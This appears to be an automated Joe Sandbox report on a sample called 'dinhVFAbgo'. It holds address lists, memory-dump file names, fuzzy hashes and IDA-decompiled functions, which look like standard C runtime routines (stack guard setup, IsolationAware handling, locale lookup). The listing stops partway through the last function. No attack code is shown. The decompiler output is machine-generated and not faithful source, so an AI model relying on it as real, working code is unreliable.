0x00e034c5
0x00e034cb
0x00e034d0
0x00e034d3
0x00e034d6
0x00e03509
0x00e0350f
0x00e03515
0x00e03517
0x00e0351d
0x00e03520
0x00000000
0x00e03522
0x00e03522
0x00e03525
0x00e03526
0x00e0352c
0x00e03532
0x00e03534
0x00e0353c
0x00e0353c
0x00e03544
0x00e03547
0x00e0354d
0x00e0354d
0x00e0354f
0x00e03556
0x00e03556
0x00e03551
0x00e03551
0x00e03551
0x00e03558
0x00e0355e
0x00e03561
0x00e03563
0x00e03569
0x00e03569
0x00e03565
0x00e03565
0x00e03565
0x00e0358d
0x00e03595
0x00e035a4
0x00e035a5
0x00e035a8
0x00e035ae
0x00e035af
0x00e035b5
0x00e035bb
0x00000000
0x00000000
0x00e035bd
0x00e035bd
0x00e035c5
0x00e035c5
0x00e035cb
0x00e035cd
0x00e035cf
0x00e035d7
0x00e035d7
0x00e035d7
0x00e035df
0x00e035df
0x00e034d8
0x00e034d8
0x00e034db
0x00e034e1
0x00e034f6
0x00e034fb
0x00e034fb
0x00e035e5
0x00e035ef
0x00e03280
0x00e03280
0x00e03280
0x00e03282
0x00e03289
0x00e03290
0x00000000
0x00000000
0x00e03296
0x00e03299
0x00e0329c
0x00000000
0x00e0329e
0x00e0329e
0x00e032aa
0x00e032b2
0x00e032b8
0x00e032c2
0x00e032c8
0x00e032cd
0x00e032d3
0x00e032d4
0x00e032d4
0x00e032d4
0x00e032db
0x00e032e1
0x00e032e3
0x00e032f0
0x00e032f3
0x00e032fe
0x00e032fe
0x00e032fe
0x00e032f5
0x00e032f6
0x00e032f6
0x00e03305
0x00e0330b
0x00e03310
0x00e03313
0x00e03316
0x00e03349
0x00e0334f
0x00e03355
0x00e03357
0x00e0335d
0x00e03360
0x00000000
0x00e03362
0x00e03362
0x00e03365
0x00e03366
0x00e0336c
0x00e03372
0x00e03374
0x00e0337c
0x00e0337c
0x00e03384
0x00e03387
0x00e0338d
0x00e0338d
0x00e0338f
0x00e03396
0x00e03396
0x00e03391
0x00e03391
0x00e03391
0x00e03398
0x00e0339e
0x00e033a1
0x00e033a3
0x00e033a9
0x00e033a9
0x00e033a5
0x00e033a5
0x00e033a5
0x00e033cd
0x00e033d5
0x00e033e4
0x00e033e5
0x00e033e8
0x00e033ee
0x00e033ef
0x00e033f5
0x00e033fb
0x00000000
0x00000000
0x00e033fd
0x00e033fd
0x00e03405
0x00e03405
0x00e0340b
0x00e0340d
0x00e0340f
0x00e03417
0x00e03417
0x00e03417
0x00e0341f
0x00e0341f
0x00e03318
0x00e03318
0x00e0331b
0x00e03321
0x00e03336
0x00e0333b
0x00e0333b
0x00e03427
0x00e03428
0x00e0342e
0x00e0342e
0x00000000
0x00e0329c
0x00000000
0x00e03282
0x00e0342f
0x00e0342f
0x00e0343c
0x00e03443
0x00e03449
0x00e0344a
0x00e0344b
0x00e03451
0x00e03456
0x00e03456
0x00e03828
0x00e03832
0x00e03833
0x00e03839
0x00e0383b
0x00e03d1e
0x00e03d20
0x00e03d22
0x00e03d28
0x00e03d2a
0x00e03d30
0x00e03d32
0x00e04100
0x00e04100
0x00e04102
0x00e04108
0x00e0410f
0x00e04115
0x00e04117
0x00e041ca
0x00e041ca
0x00e041cc
0x00e041cd
0x00e041d3
0x00000000
0x00e0411d
0x00e0411d
0x00e0411f
0x00e04125
0x00e0412b
0x00e0412d
0x00e04133
0x00e0413a
0x00e0413a
0x00e0413c
0x00e0413c
0x00e04149
0x00e04150
0x00e04156
0x00e04159
0x00e0415a
0x00e04160
0x00e04160
0x00e04164
0x00e04166
0x00e0416c
0x00e04172
0x00e04175
0x00000000
0x00e04177
0x00e04177
0x00e0417e
0x00e0417e
0x00e04175
0x00e04166
0x00e0412d
0x00e0411f
0x00e04117
0x00e03d38
0x00e03d38
0x00e03d38
0x00e03d3b
0x00e03d3f
0x00e03d3f
0x00e03d40
0x00e03d52
0x00e03d5f
0x00e03d6e
0x00e03d98
0x00e03d9d
0x00e03da3
0x00e03da6
0x00e03da8
0x00e03e7a
0x00e03e80
0x00e03f4e
0x00e03f54
0x00e03f5a
0x00e03f5a
0x00e03f5a
0x00e03f5d
0x00e03f5f
0x00e03f5f
0x00e03f65
0x00e03f6b
0x00e03f71
0x00e03f73
0x00e03f75
0x00e03f75
0x00e03f7b
0x00e03f81
0x00e03f83
0x00e03f8f
0x00e03f95
0x00e03f85
0x00e03f85
0x00e03f87
0x00e03f87
0x00e03f9b
0x00e03f9d
0x00e03f9f
0x00e03f9f
0x00e03fa5
0x00e03fa7
0x00e03fa9
0x00e03faf
0x00e03fb1
0x00e040b2
0x00e040b2
0x00e040b8
0x00e040bd
0x00e040bd
0x00e040c0
0x00e040c1
0x00000000
0x00e03fb7
0x00e03fb7
0x00e03fb7
0x00e03fbb
0x00e03fdb
0x00e03fdd
0x00e03fdf
0x00e03fe5
0x00e03feb
0x00e03fed
0x00e04094
0x00e04094
0x00e04097
0x00000000
0x00e0409d
0x00e0409d
0x00e040a3
0x00000000
0x00e040a3
0x00e03ff3
0x00e03ff3
0x00e03ff3
0x00e03ff6
0x00000000
0x00000000
0x00e03ff8
0x00e03ffa
0x00e04002
0x00e0400b
0x00e0400b
0x00e0400d
0x00e0400d
0x00e0401f
0x00e04022
0x00e04028
0x00e04031
0x00e04034
0x00e04041
0x00e04044
0x00e04045
0x00e04046
0x00e0404c
0x00e0404e
0x00e04054
0x00e0405a
0x00000000
0x00000000
0x00000000
0x00000000
0x00e0405c
0x00e0405c
0x00e0405c
0x00e0405e
0x00000000
0x00000000
0x00e04060
0x00e04063
0x00e04186
0x00e04186
0x00000000
0x00e04069
0x00e04069
0x00e0406b
0x00e0406d
0x00e0406d
0x00e0406d
0x00e04075
0x00e04078
0x00e04078
0x00e0407e
0x00e04080
0x00e04082
0x00e04089
0x00e0408f
0x00e04091
0x00000000
0x00e04091
0x00000000
0x00e04063
0x00000000
0x00e0405c
0x00000000
0x00e03ff3
0x00e03fbd
0x00e03fbd
0x00e03fbf
0x00e03fc5
0x00e03fcd
0x00e03fcd
0x00e03fd0
0x00e03fd0
0x00000000
0x00e03fbf
0x00000000
0x00e040a9
0x00e040a9
0x00e040aa
0x00e040aa
0x00000000
0x00e03fb7
0x00e03e86
0x00e03e8c
0x00e03e91
0x00e03ea3
0x00e03eb2
0x00e03eb7
0x00e03ebd
0x00e03ec0
0x00e03ec2
0x00e03edc
0x00e03ede
0x00000000
0x00e03ee4
0x00e03ee4
0x00e03eeb
0x00000000
0x00e03ef1
0x00e03ef7
0x00e03efd
0x00e03eff
0x00e03eff
0x00e03f01
0x00e03f01
0x00e03f0a
0x00e03f11
0x00e03f17
0x00e03f1a
0x00e03f1b
0x00e03f1d
0x00e03f1d
0x00e03f25
0x00e03f27
0x00000000
0x00e03f2d
0x00e03f2d
0x00e03f33
0x00e03f36
0x00e0418b
0x00e0418e
0x00e04194
0x00e041a9
0x00e041ae
0x00e041b1
0x00e03f3c
0x00e03f3c
0x00e03f43
0x00000000
0x00e03f43
0x00e03f36
0x00e03f27
0x00e03eeb
0x00e03ec4
0x00e03ec4
0x00e03eca
0x00e03ed0
0x00e03ed1
0x00e040c7
0x00e040c7
0x00e040ce
0x00e040cf
0x00e040d0
0x00e040d5
0x00e040d8
0x00e040d8
0x00e040d8
0x00e03ec2
0x00e03dae
0x00e03dae
0x00e03db4
0x00e03db6
0x00e03dee
0x00e03df0
0x00000000
0x00e03df2
0x00e03df2
0x00e03df9
0x00000000
0x00e03dfb
0x00e03e01
0x00e03e03
0x00e03e09
0x00e03e09
0x00e03e0b
0x00e03e0b
0x00e03e0d
0x00e03e16
0x00e03e1d
0x00e03e20
0x00e03e21
0x00e03e23
0x00e03e23
0x00e03e2b
0x00e03e2d
0x00000000
0x00e03e2f
0x00e03e2f
0x00e03e35
0x00e03e38
0x00e03e4c
0x00e03e52
0x00e03e6b
0x00e03e70
0x00e03e73
0x00000000
0x00e03e3a
0x00e03e3a
0x00e03e41
0x00000000
0x00e03e41
0x00e03e38
0x00e03e2d
0x00e03df9
0x00000000
0x00e03db8
0x00e03db8
0x00e03dbb
0x00e03dc1
0x00e03dda
0x00e03ddf
0x00e03de2
0x00e03de2
0x00e03de2
0x00e03de4
0x00e03de4
0x00e03de4
0x00e040da
0x00e040da
0x00e040dc
0x00e041b8
0x00e041bf
0x00e041c6
0x00e041d9
0x00e041df
0x00e041e0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00e040e2
0x00e040e8
0x00e040e8
0x00e040ee
0x00e040ee
0x00e040fa
0x00000000
0x00e040fa
0x00e03841
0x00e03841
0x00e03843
0x00e03849
0x00e0384b
0x00e03851
0x00e03853
0x00e03c33
0x00e03c33
0x00e03c35
0x00e03c3b
0x00e03c42
0x00e03c48
0x00e03c4a
0x00e03cae
0x00e03cb0
0x00e03cb6
0x00e03cbc
0x00e03cbe
0x00e03cc4
0x00e03ccb
0x00e03ccb
0x00e03ccd
0x00e03ccd
0x00e03cda
0x00e03ce1
0x00e03ce7
0x00e03cea
0x00e03ceb
0x00e03cf1
0x00e03cf1
0x00e03cf5
0x00e03cf7
0x00e03cfd
0x00e03d03
0x00e03d06
0x00000000
0x00e03d0c
0x00e03d0c
0x00e03d13
0x00e03d13
0x00e03d06
0x00e03cf7
0x00e03cbe
0x00e03c4c
0x00e03c4c
0x00e03c4e
0x00e03c54
0x00e03c5a
0x00000000
0x00e03c5a
0x00e03c4a
0x00e03859
0x00e03859
0x00e03859
0x00e0385c
0x00e03860
0x00e03860
0x00e03861
0x00e03873
0x00e03880
0x00e0388f
0x00e038b9
0x00e038be
0x00e038c4
0x00e038c7
0x00e038c9
0x00e0399b
0x00e039a1
0x00e03a85
0x00e03a8b
0x00e03a91
0x00e03a91
0x00e03a91
0x00e03a94
0x00e03a96
0x00e03a96
0x00e03a9c
0x00e03aa2
0x00e03aa8
0x00e03aaa
0x00e03aac
0x00e03aac
0x00e03ab2
0x00e03ab8
0x00e03aba
0x00e03ac6
0x00e03acc
0x00e03abc
0x00e03abc
0x00e03abe
0x00e03abe
0x00e03ad2
0x00e03ad4
0x00e03ad6
0x00e03ad6
0x00e03adc
0x00e03ade
0x00e03ae0
0x00e03ae6
0x00e03ae8
0x00e03be9
0x00e03be9
0x00e03bef
0x00e03bf4
0x00e03bf4
0x00e03bf7
0x00e03bf8
0x00000000
0x00e03aee
0x00e03aee
0x00e03aee
0x00e03af2
0x00e03b12
0x00e03b14
0x00e03b16
0x00e03b1c
0x00e03b22
0x00e03b24
0x00e03bcb
0x00e03bcb
0x00e03bce
0x00000000
0x00e03bd4
0x00e03bd4
0x00e03bda
0x00000000
0x00e03bda
0x00e03b2a
0x00e03b2a
0x00e03b2a
0x00e03b2d
0x00000000
0x00000000
0x00e03b2f
0x00e03b31
0x00e03b39
0x00e03b42
0x00e03b42
0x00e03b44
0x00e03b44
0x00e03b56
0x00e03b59
0x00e03b5f
0x00e03b68
0x00e03b6b
0x00e03b78
0x00e03b7b
0x00e03b7c
0x00e03b7d
0x00e03b83
0x00e03b85
0x00e03b8b
0x00e03b91
0x00000000
0x00000000
0x00000000
0x00000000
0x00e03b93
0x00e03b93
0x00e03b93
0x00e03b95
0x00000000
0x00000000
0x00e03b97
0x00e03b9a
0x00e03c5d
0x00e03c5d
0x00e03c5f
0x00e03c64
0x00e03c6a
0x00e03c70
0x00e03c71
0x00000000
0x00e03ba0
0x00e03ba0
0x00e03ba2
0x00e03ba4
0x00e03ba4
0x00e03ba4
0x00e03bac
0x00e03baf
0x00e03baf
0x00e03bb5
0x00e03bb7
0x00e03bb9
0x00e03bc0
0x00e03bc6
0x00e03bc8
0x00000000
0x00e03bc8
0x00000000
0x00e03b9a
0x00000000
0x00e03b93
0x00000000
0x00e03b2a
0x00e03af4
0x00e03af4
0x00e03af6
0x00e03afc
0x00e03b04
0x00e03b04
0x00e03b07
0x00e03b07
0x00000000
0x00e03af6
0x00000000
0x00e03be0
0x00e03be0
0x00e03be1
0x00e03be1
0x00000000
0x00e03aee
0x00e039a7
0x00e039ad
0x00e039b2
0x00e039c4
0x00e039d3
0x00e039d8
0x00e039de
0x00e039e1
0x00e039e3
0x00e039fd
0x00e039ff
0x00000000
0x00e03a05
0x00e03a05
0x00e03a0c
0x00000000
0x00e03a12
0x00e03a18
0x00e03a1e
0x00e03a20
0x00e03a20
0x00e03a22
0x00e03a22
0x00e03a2b
0x00e03a32
0x00e03a38
0x00e03a3b
0x00e03a3c
0x00e03a3e
0x00e03a3e
0x00e03a46
0x00e03a48
0x00000000
0x00e03a4e
0x00e03a4e
0x00e03a54
0x00e03a57
0x00e03a6d
0x00e03a73
0x00e03a79
0x00e03a7a
0x00e03c77
0x00e03c77
0x00e03c7e
0x00e03c7f
0x00e03c80
0x00e03c85
0x00e03c88
0x00e03a59
0x00e03a59
0x00e03a60
0x00000000
0x00e03a60
0x00e03a57
0x00e03a48
0x00e03a0c
0x00e039e5
0x00e039e5
0x00e039eb
0x00e039f1
0x00e039f2
0x00e03bfe
0x00e03bfe
0x00e03c05
0x00e03c06
0x00e03c07
0x00e03c0c
0x00e03c0f
0x00e03c0f
0x00e03c0f
0x00e039e3
0x00e038cf
0x00e038cf
0x00e038d5
0x00e038d7
0x00e0390f
0x00e03911
0x00000000
0x00e03913
0x00e03913
0x00e0391a
0x00000000
0x00e0391c
0x00e03922
0x00e03924
0x00e0392a
0x00e0392a
0x00e0392c
0x00e0392c
0x00e0392e
0x00e03937
0x00e0393e
0x00e03941
0x00e03942
0x00e03944
0x00e03944
0x00e0394c
0x00e0394e
0x00000000
0x00e03950
0x00e03950
0x00e03956
0x00e03959
0x00e0396d
0x00e03973
0x00e0398c
0x00e03991
0x00e03994
0x00000000
0x00e0395b
0x00e0395b
0x00e03962
0x00000000
0x00e03962
0x00e03959
0x00e0394e
0x00e0391a
0x00000000
0x00e038d9
0x00e038d9
0x00e038dc
0x00e038e2
0x00e038fb
0x00e03900
0x00e03903
0x00e03903
0x00e03903
0x00e03905
0x00e03905
0x00e03905
0x00e03c11
0x00e03c11
0x00e03c13
0x00e03c8c
0x00e03c93
0x00e03c93
0x00e03c93
0x00e03c9a
0x00e03c9c
0x00e03ca2
0x00e03ca3
0x00e041e6
0x00e041e6
0x00e041e7
0x00e041e8
0x00e041ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00e03c15
0x00e03c1b
0x00e03c1b
0x00e03c21
0x00e03c21
0x00e03c2d
0x00000000
0x00e03c2d
0x00e03853
0x00e041f0
0x00e041f0
0x00e041f6
0x00e041fc
0x00e04202
0x00e04204
0x00e04206
0x00e0420d
0x00e0420d
0x00e0420f
0x00e0420f
0x00e04218
0x00e04219
0x00e04221
0x00e04228
0x00e0422b
0x00e0422c
0x00e04232
0x00e04232
0x00e04236
0x00e0423c
0x00e0423e
0x00e04240
0x00e04246
0x00e04249
0x00e0425a
0x00e0425d
0x00e04263
0x00e04278
0x00e0427d
0x00e0424b
0x00e0424b
0x00e04252
0x00e04252
0x00e04249
0x00e0423e
0x00e0428e
0x00e04295
0x00e0429d
0x00e0429e
0x00e042a0
0x00e043ec
0x00e043ee
0x00e043fe
0x00e04401
0x00e04403
0x00000000
0x00e043f0
0x00e043f6
0x00000000
0x00e043f6
0x00000000
0x00e042a6
0x00e042a6
0x00e042ac
0x00e042af
0x00e042b5
0x00e042b8
0x00e042be
0x00e042c4
0x00e042c6
0x00e042c8
0x00e042ca
0x00e042ca
0x00e042cc
0x00e042cc
0x00e042d9
0x00e042e0
0x00e042e3
0x00e042e4
0x00e042e6
0x00e042e7
0x00e042e7
0x00e042ef
0x00e042f5
0x00e042f7
0x00e042fd
0x00e042ff
0x00e04305
0x00e04308
0x00e043c4
0x00e043ca
0x00e043df
0x00e043e4
0x00e0430e
0x00e04314
0x00e0431b
0x00e0431b
0x00e0431b
0x00e0431b
0x00e04308
0x00e04321
0x00e04321
0x00e04327
0x00e04327
0x00e04327
0x00e0432d
0x00e04333
0x00e04336
0x00e0433c
0x00e0433e
0x00e04340
0x00e04346
0x00e04348
0x00e04348
0x00e04348
0x00e04346
0x00e0434d
0x00e0434e
0x00e04350
0x00e04352
0x00e04352
0x00e04354
0x00e04356
0x00e0435c
0x00e0435e
0x00e04364
0x00e04364
0x00e0436a
0x00e0436c
0x00000000
0x00000000
0x00e04372
0x00e04374
0x00e04376
0x00e04376
0x00e04378
0x00e04378
0x00e04388
0x00e0438f
0x00e04392
0x00e04393
0x00e04395
0x00e04395
0x00e04399
0x00e0439f
0x00e043a1
0x00e043a7
0x00e043ad
0x00e043b0
0x00e0440e
0x00e04411
0x00e04417
0x00e0442c
0x00e04431
0x00e043b2
0x00e043b2
0x00e043b9
0x00e043b9
0x00e043b0
0x00e04442
0x00e04447
0x00e04456
0x00e04459
0x00e04463
0x00e04463
0x00e04465
0x00e04467
0x00e0446d
0x00e04475
0x00e0447b
0x00e0447d
0x00e04483
0x00e04485
0x00e04492
0x00e04487
0x00e04487
0x00e0448e
0x00e0448e
0x00e04495
0x00e0449b
0x00e0449c
0x00e044a2
0x00e044a2
0x00e044a7
0x00e044aa
0x00e044ae
0x00e044ae
0x00e044af
0x00e044b1
0x00e044b7
0x00e044bd
0x00000000
0x00000000
0x00000000
0x00e044bd
0x00e04364
0x00e044c3
0x00e044c5
0x00e044c8
0x00e044ca
0x00e044cd
0x00e044d3
0x00000000
0x00e044d3
0x00e03169
0x00e03160
0x00e03157
0x00e030ec
0x00e030f1
0x00e030f9
0x00e0310d
0x00e03112
0x00e03116
0x00e03116
0x00e03119
0x00e03129
0x00e04538
0x00e0453a
0x00e0453b
0x00e0453c
0x00e0453d
0x00e0453e
0x00e0453f
0x00e04544
0x00e04547
0x00e0454a
0x00e0454d
0x00e04550
0x00e0455f
0x00e04561
0x00e04587
0x00e0458c
0x00e04592
0x00000000
0x00e04563
0x00e04563
0x00e04569
0x00000000
0x00e0456b
0x00e04582
0x00e04582
0x00e04586
0x00e04586
0x00e04569
0x00e04552
0x00e04557
0x00e04597
0x00e04597
0x00e0459a
0x00e0459a
0x00e0312f
0x00e04511
0x00e04511
0x00e04518
0x00e04519
0x00e0451a
0x00e04523
0x00e04528
0x00e04530
0x00e04537
0x00e04537
0x00000000
0x00000000
0x00000000
0x00e030f9

Strings

1#QNAN, xrefs: 00E044EB
1#SNAN, xrefs: 00E044E1
1#INF, xrefs: 00E044F5
1#IND, xrefs: 00E044D7

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID:
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 0-2761157908
Opcode ID: 0f5c045a8ab7f106aa3374cfe0d6413788f08de902397c3bb3c569d137ffc8d1
Instruction ID: 31a3cd2e852bfab4b4d2b0e67dda327965fa001bfc3f47ec39c3636aceba51cb
Opcode Fuzzy Hash: 0f5c045a8ab7f106aa3374cfe0d6413788f08de902397c3bb3c569d137ffc8d1
Instruction Fuzzy Hash: C7D229B1E092298FDB65CE28DD807EAB7B9EB44305F1451EAD50DF6280D778AEC18F41

Uniqueness

Uniqueness Score: -1.00%

Function 00DE237B Relevance: 6.1, APIs: 4, Instructions: 83
memoryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00DE237B(void* __edx) {
				signed int _v8;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				long _v24;
				struct _MEMORY_BASIC_INFORMATION _v52;
				struct _SYSTEM_INFO _v88;
				void* _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t18;
				void* _t20;
				void* _t22;
				long _t23;
				char _t24;
				long _t30;
				signed int _t37;
				void* _t41;
				void* _t42;
				signed int _t44;
				long _t46;
				char _t47;
				signed int _t50;
				void* _t51;

				_t41 = __edx;
				_t18 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t18 ^ _t50;
				_t20 = 4;
				E00DDD8D0(_t20);
				_t22 = _t51;
				_v16 = _t22;
				_t23 = VirtualQuery(_t22,  &_v52, 0x1c);
				_t53 = _t23;
				if(_t23 == 0) {
					L12:
					_t24 = 0;
					__eflags = 0;
				} else {
					_v20 = _v52.AllocationBase;
					GetSystemInfo( &_v88);
					_t37 = _v88.dwPageSize;
					_t47 = 0;
					_v12 = 0;
					if(E00DF5572(_t53,  &_v12) != 0 && _v12 > 0) {
						_t47 = _v12;
					}
					_t44 =  ~_t37;
					_t46 = _t47 - 0x00000001 + _t37 & _t44;
					if(_t46 != 0) {
						_t46 = _t46 + _t37;
					}
					_t30 = _t37 + _t37;
					if(_t46 < _t30) {
						_t46 = _t30;
					}
					_t42 = (_t44 & _v16) - _t46;
					if(_t42 < _v20 + _t37 || VirtualAlloc(_t42, _t46, 0x1000, 4) == 0 || VirtualProtect(_t42, _t46, 0x104,  &_v24) == 0) {
						goto L12;
					} else {
						_t24 = 1;
					}
				}
				return E00DDCBCE(_t24, _t37, _v8 ^ _t50, _t41, _t42, _t46);
			}

0x00de237b
0x00de2383
0x00de238a
0x00de2392
0x00de2393
0x00de2398
0x00de23a1
0x00de23a4
0x00de23aa
0x00de23ac
0x00de242c
0x00de242c
0x00de242c
0x00de23ae
0x00de23b1
0x00de23b8
0x00de23be
0x00de23c4
0x00de23c7
0x00de23d1
0x00de23d8
0x00de23d8
0x00de23de
0x00de23e2
0x00de23e4
0x00de23e6
0x00de23e6
0x00de23e8
0x00de23ed
0x00de23ef
0x00de23ef
0x00de23f7
0x00de23fd
0x00000000
0x00de2427
0x00de2429
0x00de2429
0x00de23fd
0x00de243f

APIs

VirtualQuery.KERNEL32(?,?,0000001C,?,?,00000000), ref: 00DE23A4
GetSystemInfo.KERNEL32(?,?,?,00000000), ref: 00DE23B8
VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004,?,?,?,00000000), ref: 00DE2408
VirtualProtect.KERNEL32(?,-00000001,00000104,?,?,?,00000000), ref: 00DE241D

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Virtual$AllocInfoProtectQuerySystem
String ID:
API String ID: 3562403962-0
Opcode ID: 69986c9df1a0fc0a7774106787213095f7008d628a629485ab5e26efcb37fed1
Instruction ID: 1a0be723e9919989e8b2f73952b78480fd29ab4d2fac4b1ea9fd98d0a001d764
Opcode Fuzzy Hash: 69986c9df1a0fc0a7774106787213095f7008d628a629485ab5e26efcb37fed1
Instruction Fuzzy Hash: 77216572E00159ABCB21EFA6DC85AFFB7BDEB44750F054169F906E7140E6749904CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00CAB4CE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CAB4CE(void* __ebx, void* __ecx, void* __edi, intOrPtr _a4) {
				void* __esi;
				void* __ebp;
				intOrPtr _t2;
				long _t5;
				void* _t7;
				void* _t8;
				void* _t11;
				intOrPtr _t12;
				void* _t15;

				_t11 = __edi;
				_t8 = __ecx;
				_t7 = __ebx;
				_t2 =  *0xe85170; // 0x0
				_t12 = 0;
				if(_t2 != 0) {
					OutputDebugStringA("IsolationAware function called after IsolationAwareCleanup\n");
					_t2 =  *0xe85170; // 0x0
				}
				_t15 =  *0xe85164 - _t12; // 0x0
				if(_t15 != 0) {
					L6:
					_t12 = 1;
				} else {
					_t16 = _t2;
					if(_t2 != 0 || E00CAB5ED(_t7, _t8, _t11, _t12, _t16) != 0) {
						if(E00CAB30A(_t8,  *0xe681e8, _a4) == 0) {
							goto L7;
						} else {
							goto L6;
						}
					} else {
						L7:
						_t5 = GetLastError();
						__eflags = _t5 - 0x7f;
						if(_t5 == 0x7f) {
							L12:
							 *0xe85164 = 1;
							_t12 = 1;
						} else {
							__eflags = _t5 - 0x7e;
							if(_t5 == 0x7e) {
								goto L12;
							} else {
								__eflags = _t5 - 0x78;
								if(_t5 == 0x78) {
									goto L12;
								} else {
									__eflags = _t5 - 1;
									if(_t5 == 1) {
										goto L12;
									} else {
										__eflags = _t5 - 0x32;
										if(_t5 == 0x32) {
											goto L12;
										}
									}
								}
							}
						}
					}
				}
				return _t12;
			}

0x00cab4ce
0x00cab4ce
0x00cab4ce
0x00cab4d1
0x00cab4d7
0x00cab4db
0x00cab4e2
0x00cab4e8
0x00cab4e8
0x00cab4ed
0x00cab4f3
0x00cab514
0x00cab516
0x00cab4f5
0x00cab4f5
0x00cab4f7
0x00cab512
0x00000000
0x00000000
0x00000000
0x00000000
0x00cab519
0x00cab519
0x00cab519
0x00cab522
0x00cab525
0x00cab53a
0x00cab53a
0x00cab540
0x00cab527
0x00cab527
0x00cab52a
0x00000000
0x00cab52c
0x00cab52c
0x00cab52f
0x00000000
0x00cab531
0x00cab531
0x00cab533
0x00000000
0x00cab535
0x00cab535
0x00cab538
0x00000000
0x00000000
0x00cab538
0x00cab533
0x00cab52f
0x00cab52a
0x00cab525
0x00cab4f7
0x00cab546

APIs

OutputDebugStringA.KERNEL32(IsolationAware function called after IsolationAwareCleanup,?,?,00CAB450,?,?,?,?,?,?,?,00E56D18,00000010), ref: 00CAB4E2
GetLastError.KERNEL32(?,00CAB450,?,?,?,?,?,?,?,00E56D18,00000010), ref: 00CAB519

Strings

IsolationAware function called after IsolationAwareCleanup, xrefs: 00CAB4DD

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: DebugErrorLastOutputString
String ID: IsolationAware function called after IsolationAwareCleanup
API String ID: 4132100945-2690750368
Opcode ID: 3b1d265ac020fa5e277f4e13f9b0e16f37860aa6b37d0d75163965e6aed846ff
Instruction ID: 493ed88fdb15b79885203137e8650dc9d456d4f17c447a25c91fa8ed97aa65e5
Opcode Fuzzy Hash: 3b1d265ac020fa5e277f4e13f9b0e16f37860aa6b37d0d75163965e6aed846ff
Instruction Fuzzy Hash: AFF0F675E026278B8B381B6ABD9456A77986B07B4C754002EF866E2123CFA0CE559B90

Uniqueness

Uniqueness Score: -1.00%

Function 00E00111 Relevance: 4.7, APIs: 3, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00E00111(void* __ecx, signed int __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				signed int _v252;
				intOrPtr _v256;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t50;
				int _t56;
				signed int _t58;
				void* _t74;
				signed int _t78;
				intOrPtr _t80;
				signed int _t81;
				void* _t89;
				signed int _t90;
				signed int _t92;
				intOrPtr _t93;
				void* _t94;
				signed int _t111;
				signed int _t115;
				intOrPtr* _t117;
				intOrPtr* _t122;
				signed int* _t124;
				int _t126;
				signed int _t127;
				void* _t128;
				void* _t141;

				_t121 = __edx;
				_t50 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t50 ^ _t127;
				_t94 = E00DF4B3D(__ecx, __edx);
				_t124 =  *(E00DF4B3D(__ecx, __edx) + 0x34c);
				_t126 = E00E00439(_a4);
				asm("sbb ecx, ecx");
				_t56 = GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x64)) & 0xfffff005) + 0x1002,  &_v248, 0x78);
				_v252 = _v252 & 0x00000000;
				if(_t56 == 0) {
					L37:
					 *_t124 = 0;
					_t58 = 1;
					__eflags = 1;
					L38:
					return E00DDCBCE(_t58, _t94, _v8 ^ _t127, _t121, _t124, _t126);
				}
				if(E00DF9E2F(_t124, _t126,  *((intOrPtr*)(_t94 + 0x54)),  &_v248) != 0) {
					L16:
